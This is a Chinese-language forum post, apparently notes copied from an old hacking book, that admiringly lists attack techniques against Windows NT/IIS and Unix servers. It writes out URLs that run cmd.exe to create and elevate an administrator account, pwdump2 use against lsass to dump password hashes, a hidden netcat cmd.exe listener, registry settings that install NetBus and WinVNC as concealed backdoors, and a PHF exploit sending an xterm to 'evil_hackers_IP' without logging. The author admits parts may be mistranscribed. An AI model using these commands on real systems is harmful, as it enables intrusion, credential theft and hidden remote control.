[破解,駭客]美國超級駭客技術

fortuna

還在用木馬等魚兒上勾,然後用prot掃瞄,或偷窺icp漏洞,或是猜密碼,或放或寄病毒網頁
等人打開來這些初等或中等的攻擊法嗎??美國駭客的實力真是另人無法想像,
他們只需利用網址就能輕而意舉的主動攻擊了,情結不輸給電影,我們的手法
對他們而言只是無須大驚小怪的小兒科......參考書為黑紅色的網路駭客與系統安全
(好像有新版的,小皇是舊版的,名稱與外關差不多)

書籍上的重點,作者是美國著名的網路安全專家,


遠端緩衝區溢滿{buffer overflow}
緩衝區溢滿是發生在程式沒有適當的檢查輸入內容的長度
,而導致緩衝區空間不足,因此,任何預期之外的輸入,就會
掩蓋掉CPU執行堆疊的其它部分.
遠端執行命令取得系統管理者權限
https://www.infowar.co.uk/mnemonix
遠端執行一個批次檔執行任意的程式
https://www.infowar.co.uk/mnemonix/Ntbufferoverruns.htm

ISSHACK        https://www.eeye.com
在NT ISS網頁伺服器上執行程式碼
在本機中可以給使一位使用者加入到區域的管理者群組中的擴權程式
https://www.ntsecurity.net/security/getadmin.htm
有相似功能的其它程式    sechole升級版是secholed
https://www.ntsecurity.net/security/sechole.htm
(Domain Admin group) 網域管理者(升級)群組


cmd.exe NT命令解釋器
ntuser 程式 用來修改使用者,群組和政策的程式,可參考
https://www.pedestalsoftware.com

Sechole的啟動可靠在一個瀏覽器輸入一個適當的URL連網目標系統,例如下列
我們將Sechole上傳至/W3SVC/1/ROOT/SCRIPTS (這裡就是C:\inetpub\SCRIPTS)
然後用下面的URL網址啟動它
https://192.168.202.154/scripts/secholle.exe
這樣做會成功的將IUSR_machine_name帳號加入管理者群組中,我們並沒有
IUSR的密碼,因此我們為了要避免登入IUSR,通常是在目標系統上開個帳號,
做法是利用ntuser公用程式透過瀏覽器執行下列複雜的URL(為了方便閱讀內容經過裝飾)
https://192.168.202.154/scripts/cmd.exe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20add%20mallory%20-password%20secret
以上%20再網語中是空白的意思,所以以上網址會被執行為
(cmd /c 會送出ntuser命令到shell,在完成時終結自己)
cmd /c ntuser -s <servername> add <username> -password <password>
以上我們是以corpl做伺服機名稱,mallory是使用者名稱,secret當密碼,
用類似的URL攻擊者可以用ntuser幫你把mallory加到管理者群組裡,如下 (LORGUP是指某個區域群組)
cmd /c ntuser -s <servername> LORGUP APPEND <groupname> <username>...
https://192.168.202.154/scripts/cmd.exe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20lgroup%20Administrators%20mallory
同機能的批次檔寫法如registry,cmd
內容: net localgroup administrators <USER> /add

安全系統ISS目錄和一些潛在可行的目錄
https://www.iss.net/xforce/alerts/advise6.html
以下/W3SVC/1/ROOT通常是指C:\Inetpub\還有News及Mail
/W3SVC/1/ROOT/msade
/W3SVC/1/ROOT/cgi-bin
/W3SVC/1/ROOT/SCRIPTS
/W3SVC/1/ROOT/ISSADMPWD
/W3SVC/1/ROOT/_vti_bin
/W3SVC/1/ROOT/_vti_bin/_vti_adm
/W3SVC/1/ROOT/_vti_bin/_vti_aut
(_vti_bin都是安裝Front Page之後衍生出來的)

放批次檔的地方
HKLM\software\Microsoft\CurrentVersion
                    \RUN [any]
                    \AeDebug Debugger
                    \WinLogon Userinit

------------------------------------------------------------

執行NT的NT Repair Disk Utility (rdisk) 會在%SYSTEMROOT%\repair
中產生一個壓縮過的SAM檔叫SAM._ ,還原法: C:\>expand SAM._ SAM
NTFDOS:NTFS驅動軟體https://www.sysinternals.com

可破SYSKEY的是Pwdump2    https://www.webspan.net/~tas/pwdump2
它可使用DLL注入的方法將自己的程式碼插入其它具有更高權限的行程中,
一但注入更高權限的行程之後,這些惡質的執行碼就可以自由的內部呼叫API,
來存取SYSKEY加密的密碼而不需將其解密.
pwdump2所瞄準的高權限行程是lsass.exe,它是區域安全授權子系統,
Pwd2是將自己注入到lsass的位址空間中,因此在執行Pwdump2之前必需動手
找出lsass.exe的行程邊號(PID),以下是用NTRK裏的pulist公用程式並將
輸出導向find找出lsass.exe的PID為50
(以下C:\代表本機,D:\代表遠端主機)
D:\>pulist | find "lsass"
lsass.exe    50    NT AUTHORITY\SYSTEM
現在Pwdump2可以使用PID 50來執行了,預設下會將它的輸出
顯示在瑩慕上,可以很容意的導向一個檔案
D:\>pwdump2 50

ASCII無法顯示的字元Num Lock)ALT-255或ALT-129

用AT執行遠端排程 (雙引號)
C:\>at \\192.168.202.44 10:40P""remote /s cmd secret""
            去除可用"[job id] /delete"
遠端查時間c:>\sc \\192.168.202.44 start schedule
sc.exe是可啟動排程服務 C:>\net time \\192.168.202.44


以下D:\代表本機C:\代表遠端
D:\>remote /c 192.168.202.44
secret
C:\>Dir winnt\repair\Sam._
C:\>@Q        (結束用戶端)
C:>\@k        (結束伺服端)
但remote不可啟動認何用到Win32 console API的程式

remote.exe    /C為用戶端        /S為伺服模式

遠端監視抓取螢幕https://www.uk.research.att.com/vnc
-----------------------------
Netcat
以下是使用command來聆聽
-L 不會停止
-d 暗中進行,不會有戶動的主控台
-e 是指定啟動NT命令的解釋器,
遠端為C:\TEMP\NC11NT
-p 是指定聆聽的通訊阜
C:\TEMP\NT11NT>nc -L -d -e cmd.exe -p 8080
例 C:\TEMP\NT11NT>nc 192.168.202.44 8080
D:\temp\regini -m \\192.168.202.44 netbus.txt

NTRK中的regini.exe可以直接把必要的項目加入到遠端的Registry內
REGINI讀取文字檔當做輸入來進行Registry的修改,所以我們必需建立一個
Netbus.txt的檔案出來
D:\temp\regini -m \\192.168.202.44 netbus.txt
的檔案內容如下        !!!詳細請到書局查閱,不知有沒有抄正卻!!!
HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus Server\Genera
Accept=1
TCPPort=80
Visibility=3        在隱藏模式下執行
AccessMode=2
AutoStart=1        在windows啟動時執行

HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus Server\Protection
password=impossible

WinVNC的用法第一部將必要檔複製到目標系統(winVNC.exe,VNCHooks.dll,OMNI THREAD_RT.DLL)
2.設定使用此程式的密碼,建一個叫WINVNC.INI的檔案內容如下
    !!!詳細請到書局查閱,不知有沒有抄正卻!!!
HKEY_USER\.DEFAULT\software\ORL\WinVNC3
SocketConnect=REG_DWORD
0x00000001
password=REG_BINARY 0x00000008

然後使用regini將這些值載入到遠端Registry內
C:\>regini -m \\192.168.202.33 winvnc.ini

NTRK的regdmp公用程式是可把Registry轉錄下來

最後將winVNC安裝起來成為伺服程式並啟動它,下列的遠端命令,(記得這是遠端命令)
C:\>WinVNC -install
C:\>net start winvnc

現在我門就可以啟動vncviewer程式並和我們的目標連線,
下圖是設定連線到"顯示0"IP的位置,下一步是密碼
___________________________________________
| vncSERVER    |192.168.202.33.0    |v|
===========================================

待續.....

截取修改密碼https://www.ntsecurity.net/security/passworddll.html
下例是可直接顯示原始碼,Netscape是存檔
https://www.Company.com/scripts/files.asp::$DATE
APS檔後面多加句點就有機會看見原始檔,或以16進位來破姐修正版
https://www.Company.com/code/example.asp.
https://www.Company.com/code/example%2easp
--------------------------------------

一部機器的SID是一串數字,以S-1開頭,並以卵橫號分成好幾段,而最後一祖
的數字稱為RID,對於NT內建的使用者與群組都有預先定意的RID,
例如Administrator的RID碼一定都是500,而GUEST為501,駭客可用sid2user來找出
已知SID和RID為500來找出管理者的帳號名稱(既使改過名稱)
C:\>sid2user \\192.168.2.33 8915387 1645822062 18....5 500    (S-1和短橫號是省略的)
https://www.chem.msu.su:8080/~rudnyi/NT/sid.txt
https://www.ntmag.com/Magazine/Article.cfm?ArtideID=3143

-----------------------------------------
最佳的xterm
UNIX可在相容的機器上顯示X Window,也能透過prot -6063顯示在遠端的
X伺服器上,然而加上-dispaly參數攻擊者可以將他自己的命令介面層導向自己
的X伺服器,可以改良原PHF攻擊方式/cgi-bin/phf?Qalias=z%0a/bin/cat%20/etc/passwd
既然攻擊者具有在網頁伺服器上執行遠端命令的能力,只要把這個攻擊稍微修改一下
,就可以獲取交談式介面層存取,攻擊者要做的是將命令內容中的/bin/cat
/etc/passwd 改成 /usr/X11R6/bin/xterm -ut -dispaly evil_hackers_IP:0.0 完整的命令如下:
/cgi-bin/phf?Qalias=z%0a/usr/X11R6/bin/xterm%20-ut%20-dispaly%20evil_hackers_IP:0.0
上面這個是在遠端的網頁伺服器就會執行xterm並且顯示在攻擊者(evil_hackers)的X伺服器上
(視窗ID=0;螢幕ID=0),因為我們加上了-ut參數,因此這個動作並不會被系統記錄
下來,這樣攻擊者跟本不需要登入任何伺服程式就可以獲得教談式介面層存取,
通常我們會使用xterm的完整路徑,因為我們攻擊展開時,其PATH環境參數不一定設定
符合我們的需求,使用完整路徑才能卻保網頁伺服器可以順利找到xterm執行檔

===================================================

port    service
7    echo
9    discard
13    daytime
19    Chargen
21    ftp
22    ssh
23    telnet
25    smtp
25    smap
37    time
53    dns
79    finger
80    http
110    pop3
111    sunrpc
139    netbois
143    imap
443    https
512    exec
513    login
514    shell
2049    nfs
4045    lockd
31337    UDP (BO)
12345    TCP (NetBus)
1394    DVD
31337    unassigned
12345    unassigned

135-139        UPD和TCP/IP

LINUX用網路結構探勘工具https://www.marko.net/cheops
超級抓站軟體https://www.blighty.com/products/spade的Sam Spade還有Crawl,Website
洩漏檔案內容,只要攻擊者知道檔案位置並以非標準的URL送出要求....
詳https://www.microsoft.com/security/bulletins/ms99-010.asp

網路007        https://www.samspade.org/
作葉系統探知器Queso    https://www.apostols.org/projectz/
網路源由結構圖https://www.visualroute.com的VisualRoute
網路結構探索工具https://www.marko.net/cheops
https://www.home.cs.utwente.ht/schoenw/scotty的Tkined原本是Scotty函式庫的一部份
Nnmap的更新工具https://www.insecure.org:80/cgi-bin/nmap-submit.cgi
https://www.remotelyanywhere.com網頁NT管理工具Remotely Anywhere
2.Remotely Possible / Control IT    https://www.cai.com的Control IT可在Windows,Linux,Solaris上用
https://www.uk.research.att.com/Vnc


queue處理器的佇列
dual-homed兩棲主機
HTML換行碼%0a
HTML空格碼%20
Virtual虛擬
Private絲人
back channel回傳通道 ,定意:一個通訊管道起始端為目標系統而非攻擊端
shared library共享函式庫
signal信號
aliase化名

woawoa

這種技術我想不是每個人都看的懂..
但是概念漫詳細的~幫推一下!!